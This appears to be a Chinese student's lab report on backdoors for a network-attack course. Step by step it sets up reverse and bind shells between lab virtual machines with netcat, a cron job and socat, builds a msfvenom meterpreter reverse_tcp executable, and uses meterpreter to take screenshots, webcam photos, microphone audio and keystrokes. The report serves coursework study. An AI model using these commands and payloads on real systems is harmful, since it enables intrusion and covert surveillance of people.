2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 实验任务
(1)使用netcat获取主机操作Shell,cron启动 (0.5分)
(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
- 基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
通过点击一些不安全的链接或是进入钓鱼网站,在这个过程中就容易下载恶意程序,使得后门被植入。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows中,运行绑定有后门的程序时,后门就会启动;
Linux中,可以通过crontab功能定时触发,或通过给软件绑定注入shellcode,从而启动后门。
- (3)Meterpreter有哪些给你映像深刻的功能?
有可以打开摄像头进行录制、捕捉屏幕、得到远程控制权、捕获按键信息、控制被控主机的shell,执行指令等功能。
- (4)如何发现自己有系统有没有被安装后门?
查看开机自启动项中有无可以的;
查看杀毒软件中有没有危险软件;
查看本机有没有异常开放的端口。
- 实验准备
- Windows获得Linux Shell
在Windows7环境中,使用ipconfig查看本机IP;
使用ncat.exe程序监听本机的5206端口:
在Kali中,使用nc指令的-e选项反向连接Windows主机的5206端口:
成功获得Kali的shell。
- Linux获得Windows Shell
在Kali中,使用ifconfig查看IP;
使用nc指令监听5206端口;
在Windows7环境中,使用ncat.exe程序的-e选项项反向连接Kali主机的5206端口;
成功获得Windows的Shell。
- 实验过程
- 使用netcat获取主机操作Shell,cron启动
在Windows7环境中,监听5206端口;
在Kali中,用crontab -e指令编辑一条定时任务
在编译器的最后一行添加39 * * * * /bin/netcat 172.30.4.74 5206 -e /bin/sh,使每个小时的第39分钟反向连接Windows主机的5206端口:
当到达39时,获得Kali的shell
- 使用socat获取主机操作Shell, 任务计划启动
- socat:socat是ncat的增强版,它使用的格式是
socat [options] <address> <address>
```,其中两个address是必选项,而options 是可选项。socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address就是代表了其中的一个方向。
- 在“任务计划程序”中“创建任务”,填写任务名称,新建一个触发器,并在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:5206 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5206,同时把cmd.exe的stderr重定向到stdout上;

- 在Kali中,输入指令socat - tcp:172.30.4.74:5206,成功获得主机操作Shell。

### - 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- 输入生成后门程序的指令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.128 LPORT=5206 -f exe > 20165206_backdoor.exe

- 在Windows环境中,输入指令ncat.exe -lv 5206 > 20165206_backdoor.exe,这样被控主机就进入了接收文件模式;

- 在Kali中,执行nc 172.30.4.74 5206 < 20165206_backdoor.exe,传送接收文件;
- 在Kali中,再打开一个终端,使用msfconsole指令进入msf控制台;

- 进行配置,使用监听模块,设置payload,设置反弹回连的IP和端口。输入指令如下:
use exploit/multi/handler(使用监听模块,设置payload)
set payload windows/meterpreter/reverse_tcp
(使用和生成后门程序时相同的payload)
set LHOST 192.168.153.128
set LPORT 5206

- 输入exploit进行监听;

- 在Windows7中运行后门程序,输入指令20165206_backdoor.exe;

- Kali获得Windows主机的连接,并且得到了远程控制的shell;

### - 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 使用screenshot指令可以进行截屏


- 使用webcam_snap指令可以使用摄像头进行拍照;

- 使用record_mic指令可以截获一段音频;

- 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

## - 实验体会
这次实验很新奇,趣味性很强,接触到了不少以前没接触过的东西。通过这次实验让我初步尝试了一些我所想象的黑客可以进行的操作,比如侵入对方主机获取shell、打开摄像头录制等等,虽然只是一些基本操作,但我也很有成就感,收获很大。实验过程遇到了一些困难,但通过学习老师教程以及参考学长学姐的博客,也基本完成了实验。在今后的学习中,我将会进一步深入研究这方面的知识。
2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
- 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...
- 2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践 一.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
随机推荐
- IOC的理解(转载)
转载自:https://www.zhihu.com/question/23277575/answer/169698662 要了解控制反转( Inversion of Control ), 我觉得有必要 ...
- codeforces-1131 (div2)
A.把右上角的凹缺口补上变成凸的就成了规则矩形 #include <map> #include <set> #include <ctime> #include &l ...
- Unity下载
Unity下载 Mac OS或Windows操作系统都可以使用对应的Unity版本进行开发 Unity引擎的官方网站:http://www.unity3d.com 官方下载地址:http://unit ...
- Python 条件、循环、异常处理
一.条件语句 1.布尔值 条件语句中,判断条件的值一般是布尔值.即条件为真时,将执行什么,条件为假时,将执行什么. 下面的值在作为布尔表达式的时候,会被解释器看做假(false): False ...
- 第一节:EF Core简介和CodeFirst和DBFirst两种映射模式(以SQLite和SQLServer为例)
一. EF简介 1. 定义 Entity Framework (EF) Core 是轻量化.可扩展.开源和跨平台的数据访问技术,它还是一种对象关系映射器(ORM),它使.NET 开发人员能够使用面向对 ...
- 简单的Web日志处理细节
- request.getParameterValues 出现 [Ljava.lang.String;@ 错误
在实现简单的本地登录系统时,需要把page1.jsp的表单显示在page2.jsp中. 其中获取page1.jsp表单的办法就是在页面1的<form>中加入action="pag ...
- Python3:输出当前目录所有目录和文件--walk()函数
有了前一篇文章的介绍,再输出目录,也不过是多写一个函数的事情了,我把它封装成了类~~ 发现walk()真的是一个超级方便好用的函数.这种情况下用listdir()是搞定不了的啦 import os c ...
- word20161229
1. launch 英[lɔ:ntʃ]美[lɔntʃ, lɑntʃ]vt. 发射; 发动; [计算机]开始(应用程序); 开展(活动.计划等);vi. 投入; 着手进行; 热衷于…;n. 投掷; 大船 ...
- PostgreSQL学习笔记(二)-安装pgAdmin
继上篇安装PostgreSQL后,我们需要安装一个PostgreSQL的图形化管理工具. pgadmin管理工具 创建Python的虚拟环境 cd /root/venv python -m venv ...